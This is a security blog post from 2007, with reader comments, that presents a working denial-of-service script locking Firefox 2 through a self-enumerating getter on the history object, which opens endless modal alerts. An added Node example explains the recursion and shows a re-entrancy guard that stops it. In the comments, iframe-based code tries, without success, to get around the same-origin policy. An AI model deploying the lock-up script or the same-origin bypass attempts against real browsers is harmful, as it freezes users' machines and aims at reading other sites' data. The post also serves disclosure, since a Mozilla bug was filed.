Firefox history DoS attack

Here’s a complete DoS attack on Firefox using the history object. The getter defined on history.x enumerates every property of history, and because __defineGetter__ makes "x" an enumerable property the loop reaches "x" itself; reading this[i] at that point calls the getter again from inside itself, so the recursion is unbounded, a modal alert() is opened at every level, and the empty catch swallows anything that would otherwise end it:

window.onload = function() {
    // Define an accessor property "x" on history. __defineGetter__ makes it
    // enumerable, so the for...in below visits "x" as well.
    history.__defineGetter__("x", function() {
        for (var i in this) {
            try {
                // When i is "x", this[i] runs this getter again: unbounded
                // recursion, with a modal alert() at every level.
                alert(this[i]);
            } catch (e) {
                // Errors, including the recursion error, are swallowed here,
                // so nothing stops the loop.
            }
        }
    });

    history.x;   // the first read of the getter sets the whole thing off
}

Tested on Firefox 2.0.0.9 on Mac: a window pops up with two blank buttons and you are unable to do anything without using Force Quit.
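The following is an added example, not code from the original post, that reproduces the shape of the getter above on an arbitrary object so it can be run under Node rather than in a browser. alert() is replaced by a callback, and the names installEnumeratingGetter, runUntilStackLimit, installGuardedGetter and runWithReentrancyGuard are mine. It records how deep the self-re-entry goes before the engine's own stack limit throws (the error the empty catch silently eats), and contrasts that with the same walk behind a re-entrancy guard, which finishes at depth 1 because the only source of recursion is the getter reading itself.

```javascript
// Added example (not the original post's code). A getter shaped like the one in
// the post: it enumerates the object it lives on and reads every property. The
// getter is itself an enumerable property, so the read of this[name] re-enters
// it, and the inner catch keeps going past any error. `visit` stands in for
// alert(); `stats` records what happened. Names here are hypothetical.
function installEnumeratingGetter(target, name, visit, stats) {
  Object.defineProperty(target, name, {
    enumerable: true,     // __defineGetter__ also creates an enumerable property
    configurable: true,
    get() {
      stats.depth += 1;
      if (stats.depth > stats.maxDepth) stats.maxDepth = stats.depth;
      try {
        for (const key in this) {
          try {
            visit(key, this[key]);          // key === name: recursive re-entry
          } catch (e) {
            stats.caught += 1;              // the original swallows this silently
            if (!stats.firstError) stats.firstError = e.name;
          }
        }
      } finally {
        stats.depth -= 1;
      }
      return undefined;
    },
  });
}

// Works on any object, not just history: the recursion only stops when the
// engine's stack limit throws a RangeError, and that error is caught and ignored.
function runUntilStackLimit(obj) {
  const stats = { depth: 0, maxDepth: 0, caught: 0, firstError: null, reads: 0 };
  installEnumeratingGetter(obj, 'x', () => { stats.reads += 1; }, stats);
  obj.x;                                    // the trigger, as in the post
  return stats;
}

// Same walk with a re-entrancy guard: a read of the property while the getter is
// already running returns immediately instead of recursing. This isolates the
// mechanism: remove the self-read and the enumeration ends at depth 1.
function installGuardedGetter(target, name, visit, stats) {
  let busy = false;
  Object.defineProperty(target, name, {
    enumerable: true,
    configurable: true,
    get() {
      if (busy) return undefined;           // re-entrancy guard
      busy = true;
      stats.depth += 1;
      if (stats.depth > stats.maxDepth) stats.maxDepth = stats.depth;
      try {
        for (const key in this) visit(key, this[key]);
      } finally {
        stats.depth -= 1;
        busy = false;
      }
      return undefined;
    },
  });
}

function runWithReentrancyGuard(obj) {
  const stats = { depth: 0, maxDepth: 0, keysSeen: [] };
  installGuardedGetter(obj, 'x', (key) => { stats.keysSeen.push(key); }, stats);
  obj.x;
  return stats;
}

// Usage: a bare ({}) is enough, which is the point made in the comments below.
const unbounded = runUntilStackLimit({});
console.log('recursed to depth', unbounded.maxDepth, 'stopped by', unbounded.firstError);
const guarded = runWithReentrancyGuard({ a: 1, b: 2 });
console.log('guarded walk depth', guarded.maxDepth, 'keys', guarded.keysSeen);
```

In the browser the difference is that each level also opens a modal alert(), so the user is stuck inside the dialogs long before the script engine's recursion limit is reached; under Node the only visible effect is the RangeError that the catch discards.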

9 Comments

  1. Awesome AnDrEw wrote:

    Nice work, Gareth. I’m really pulling that you figure out a way to break the same origin policy simply because it would be quite impressive.

    Posted 14 Nov 2007 at 9:43 pm
  2. Gareth Heyes wrote:

    Thanks :) yeah that’s my plan, I’m not sure it’s possible because the objects are spoofed getters. I’m having fun trying though

    Posted 14 Nov 2007 at 9:48 pm
  3. .mario wrote:

    Yep - the holy grail of SOP. I’ve been trying various approaches recently but haven’t had any success yet.

    My last attempt was to fill iframes with HTML via this.innerHTML='payload' in the src attribute and trying to access the rendered content after a timeout. But Firefox manages to handle it too - any property inside contentWindow is access restricted.

    Posted 15 Nov 2007 at 10:14 am
  4. Gareth Heyes wrote:

    Here’s my new attempt:

    window.onload = function() {
        var newElement = document.createElement('iframe');
        newElement.src = 'http://www.google.co.uk/';
        newElement.id = 'iframe';
        newElement.onload = function() {
            var doc = this.contentWindow.document;
            this.__defineGetter__('contentWindow', function() { return doc });
            x = this.contentWindow;
            delete this.contentWindow;
            delete doc;
            alert(x);
        }
        document.body.appendChild(newElement);
    }

    Doesn’t work though :(

    Posted 15 Nov 2007 at 11:46 am
  5. Gareth Heyes wrote:

    Accessing body or innerHTML causes a permission error.

    Posted 15 Nov 2007 at 11:47 am
  6. Jesse Ruderman wrote:

    Thanks for discovering and reporting this clever way to confuse Firefox with recursion. I’ve filed https://bugzilla.mozilla.org/show_bug.cgi?id=403999 with a clearer test case — you can use any object, even ({}), in place of the history object.

    Posted 16 Nov 2007 at 7:58 am
  7. Gareth Heyes wrote:

    Hey Jesse

    No problem! Yeah I figured it would work on any object but the history one was the one I was testing at the time.

    Posted 16 Nov 2007 at 9:13 am
  8. Jophn Deo wrote:

    Does anyone have a study hint in order to fully appreciate the technical implications?

    Posted 17 Nov 2007 at 6:08 pm
  9. Jesse Ruderman wrote:

    Jophn, I’d start by reading old bugs in bugzilla.mozilla.org about JavaScript recursion limits, and then using those bug reports to find the relevant source code. Once you understand how they work, you might have enough information to fix the bug, or you might not — it might require knowledge of XBL or something. I don’t know, I’m more a tester than a Gecko developer ;)

    Posted 18 Nov 2007 at 7:31 am
